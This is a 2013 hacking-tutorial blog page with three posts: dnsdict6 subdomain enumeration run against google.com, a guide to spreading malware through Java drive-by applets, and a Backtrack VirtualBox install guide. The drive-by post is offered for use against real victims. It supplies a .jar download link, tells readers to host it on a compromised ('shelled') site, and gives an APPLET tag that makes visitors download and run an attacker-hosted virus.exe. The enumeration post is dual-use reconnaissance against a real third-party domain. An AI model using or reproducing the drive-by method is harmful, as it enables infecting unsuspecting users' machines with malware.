New Post

Rss

Sunday, March 24, 2013
DNSDICT6 Hack Tool Tutorial | Know your Backtrack HackingLoops

DNSDICT6 Hack Tool Tutorial | Know your Backtrack HackingLoops

Hacking is always fun but only when you know to do the things. All websites available on Net teaches only basic stuff or simple novice level stuff. There is one website which provides Elite level tutorials and Concepts. To strengthen our Name, we are starting a sub-level Campaign KYB (Know your Backtrack) under BEHC (Born Ethical hackers Club) campaign. In KYB campaign, we will teach all the Backtrack Hacking Tools to Hackers. This is the First tutorial in this series. Today we will learn DNSDICT6 Hacking Tool. So lets begin our learning..

DNSDICT6 : BASICS

DNSDICT6 is a Information Gathering tool provided with Backtrack. This tool is used to find all the sub-domains of a website or web server. The most advanced use of DSNDICT6 is to enumerate all IPv4 and IPv6 addresses and extract the dumps like sub-domains, IP information. This tool is quite a powerful tool because it also extracts those sub domains which are restricted or invisible for users. 


DNSDICT6 Tutorial
DNSDICT6 Tutorial


Basic Syntax of DNSDICT6 is :


For example :


dnsdict6 -d4 google.com  ( This will extract all sub-domains of google and their IPv4 and IPv6 information.

There are certain Parameters that we can use with dnsdict6 :
  1. -d is used to display information on Name Servers and MX Records
  2. -4 is used to dump IPv4 addresses.
  3. There are four types of dictionary which are already inbuilt in this tool. -s(mall=50), -m(edium=796) (DEFAULT) -l(arge=1416), or -x(treme=3211).
  4. -t is used to specify no. of threads.
Advanced Example of DNSDICT6:
dnsdict6 -d46 -x -s -t 10 google.com ( This will extract all the sub-domains of Google with their IPv4 and IPv6 information).
 Now lets learn How to use DNSDICT6.

DNSDICT6 (Know your Backtrack [KYB]) Tutorial :


1. First of all start your Backtrack Linux. Now to start DNSDICT6 we have multiple ways.
a. Go by GUI Menu Based options : 
Applications --> BackTrack --> Information Gathering --> Network Analysis --> DNS Analysis --> DNSDICT6

b. Open the terminal and type DNSDICT6 to open the tool.


2. After doing above step we will see something like :
Dnsdict6 tutorial
DNSDICT6 Tutorial Step 2
Above snapshot shows the basic structure of DNSDICT6 syntax and parameters that we can use on it. 

3.Now say we want to Enumerate all the sub-domains on a website say google.com. Then type the command :


dnsdict6 -d46 -s -t 20 google.com
The above command will enumerate all IPv4 and IPv6 information of all sub-domains of google.com and -s will perform service guessing and 20 is the number of threads running simultaneously to achieve it.

DNSDICT6 Tutorial
Sample DNSDICT6 Query


The below snap shot shows the output of above command :

Output of DNSDICT6 Sample Query Execution
Output of DNSDICT6 Sample Query Execution

Now for advanced usage, we can also incorporate the Dictionary in our DNSDICT6 command. 

First of all we need to locate the dictionary file. If don't have create a sample dictionary file on your Virtual Machine Backtrack Desktop say dictionary.txt is file name on desktop.

Now the command will be :

dnsdict6 -d46 -s -t 20 google.com ~/Desktop/dictionary.txt

Now it will only extract those sub-domains whose keywords match with dictionary words. Below is the output of above execution :

DNSDICT6 Dictionary Brute Force Attack
DNSDICT6 Dictionary Brute Force Attack
 The dictionary based attack is also known as DNSDICT6 Dictionary Brute force attack. This extract only that information that we wish to extract. So its the best attack but for this we need to make our dictionary most powerful. There are several Hacking Database dictionaries available online. You can give them a try.
That's all about DNSDICT6 Information Gathering Tool.

We hope you all appreciate Hackingloops BEHC campaign and its sub campaign KYB ( Know you Backtrack). If you have any queries or doubts ask us in form of comments. 
Saturday, March 23, 2013
How Hackers Spread Java Drive by Malware online

How Hackers Spread Java Drive by Malware online

We are back with a new tutorial. Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for victims? Well you will definitely be disappointed when you’ll know that this trick fails sometimes! Victims are now mostly aware of the old social engineering stuff.  But cheers up my friend there's no end, i will show you a very effective methods that Hackers  use to spread malicious viruses/worms.  But first of all we should know what is Java Drive by Malware?

What is Java drive by?

A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click "Run" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their permission with the help of java drive by. You can see the image of error below this: 

Java Drive by Malware
Jave Drive By
Okay so whats the scenario behind this? well this is a java script in the source which pop ups the error, So lets learn how to do the job.  

Tools Needed :

i) a .jar file which is the main player of this game. Download it from here  
http://www.mediafire.com/?mmafl2carb1s159
ii) A shelled web where you will upload files for JAVA DRIVE BY! Plus you should know basic HTML to make a attractive web page. iii) A java script which is the backbone of your game.
Now lets get started, Upload you .jar file on the shelled web, than create a fake webpage its up to you how you much you make fake webpage attractive, but you have to add the java code due to which the pop up error will appear.


Java Code :

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
    <PARAM NAME = "AMLMAFOIEA" VALUE = "http://www.yoursite.com/virus.exe">
So add the above code in your face webpage, just make some changes replace VALUE = "http://www.yoursite.com/virus.exe" with your virus like the image below:

Malicious code of Java Drive by Attack

 So this is it! Simplest and most effective method used by attackers to spread your malicious software.
Thursday, March 21, 2013
How to Install Backtrack on Virtual Box Tutorial

How to Install Backtrack on Virtual Box Tutorial

Backtrack is backbone of hackers. If you don't use it then stop calling yourself as Hacker. In our BEHC campaign, i have told you that we will be using Backtrack as our secondary OS i.e. virtual machine for performing advance hacking techniques. Most of people faced problem in installing Backtrack 5 r3. Today, i will guide you how to install Backtrack Operating system on Virtual Box or any other Virtual machine. Let's start...




Install Backtrack
Install Backtrack



Basic things before beginning installation:
1. Virtual Box
2. Backtrack Linux OS ISO image or DVD

Now lets learn stepwise, how to install Backtrack Linux on Virtual Box:
1. First of all open the Virtual Box by clicking on Virtual box icon ( will come after installing virtual box).

2. Now for first time we need to create Virtual Machine (Virtual Operating system on which we will install Backtrack).

To do so Click on New button  then a pop up will open. In Name fill anyname that you wish to give to your virtual Machine say Hackingloops. Select Type as Linux and Version as Other Linux. Sample is shown below:
Install Backtrack on VM
Create new VM

 On Clicking Next Select the Ram according, for best optimized performance try to allocate more i.e. anything between 1 GB to 3 GB. Say i allocated 3 GB(Maximum for 32 Bit).


Select Ram for VM
Select Ram for VM

Then click on Next Button as highlighted. Now Proceed as shown in snapshots.


Select Create Virtual Drive
Select Create Virtual Drive

As shown above click on Create :


Select VDI
Select VDI

 Select VDI (Virtual Disk Image) and Click on Next.


select dynamically allocated option
select dynamically allocated option

Now select Dynamically Allocated as shown above.


Assign Hard Drive Size for VM
Assign Hard Drive Size for VM
Now assign the Virtual Hard Disk size as shown above, 20GB will be Good for optimization. Now When you click on Create Virtual Machine will be created as shown Below.


Configure Internet Settings on VM
Configure Internet Settings on VM


To enable internet over the Virtual Machine, we need to configure the Network as shown below :



Configure Internet Settings on VM
Configure Internet Settings(Bridge Adapter) on VM


After doing network settings, we need to assign Backtrack ISO image to VM's Disk drive to begin the setup on starting the setup. To assign Backtrack ISO to VM's Disk drive, do the settings as shown below:


Assign Backtrack ISO image to Disk Drive
Assign Backtrack ISO image to Disk Drive

Now the basic settings of Virtual Machine Over. Now Let's begin Backtrack Installation on this VM. For this Click on Start Button on Top of Virtual Box, then you will see something like below :


Backtrack Installation
Backtrack Live CD starts

Press Enter to proceed, now you will see Backtrack Setup Menu, Select Backtrack Text Mode : Default Boot (first in the menu) and press enter :


Select Backtrack Text
Select Backtrack Text

Now set up will Begin.
In Case of  Intels I-series processors say I3, I5, I7 etc. You will get an error Message that

"This kernel requires an x86-64 CPU, but only detected an i686 CPU"

For correcting this, you have follow below steps :
1. Restart your Computer or Laptop, During Boot select the Boot setting usually Esc key or F1 or F2 key. 
2. In Boot Menu Settings, Enable the Visualization.
3. Save the Boot Setting and start your PC or laptop.
4. Start Virtual Box and Begin from last step by selecting Backtrack Text - Default Boot text Mode.

When Kernel starts you will see something like below :
Backtrack Live CD starts
Backtrack Live CD starts

In root@bt: type startx and press enter to start Backtrack Live CD in GUI mode as shown below :


Give Startx to begin GUI mode
Give Startx to begin GUI mode

Now you will see the Desktop of Backtrack Live CD. If you want to use only Live CD features you can do so right now. But if you want to use Backtrack to full then we need to install Full backtrack. For that Click on Install Backtrack Icon on Desktop  as shown below:


Click Install Backtrack Icon to Begin Set up
Click Install Backtrack Icon to Begin Set up

Now 7 Step set up will begin (just basic settings as shown below). Do as shown in next 7 Screen Shots:


Select English lang
Select English Language

Click Forward :


Select Region and Time zone
Select Region and Time zone

Set Region and Time Zone, then Click on forward :


Set Keyboard layout
Set Keyboard layout

Select Keyboard Settings, deafult US and click forward:


Select Erase VBOX Harddisk
Select Erase VBOX Harddisk

Click Forward :
Finish Backtrack Installation by clicking Install
Final Step Click on Install

At last Click on Install and Sit back for 15 to 20 minutes to let the set up. Once the set up is over your VM is ready.
That's all the installation of Backtrack on Virtual Machine. Its just one time procedure.
From Next time Just Click on Start Your Virtual Machine to start Backtrack.
Note : From Next time Please select the Hard Drive Boot Option from the Kernel Menu. Next it will ask you for BT Login: , Give root as BT login and toor as BT password and On starting Backtrack you need to give command Startx at command prompt. Have Fun!

If you have any issues ask me in form of comments.
Copyright © 2012 Learn How to Hack - Best Online Ethical Hacking Website All Right Reserved
Designed by Hackingloops.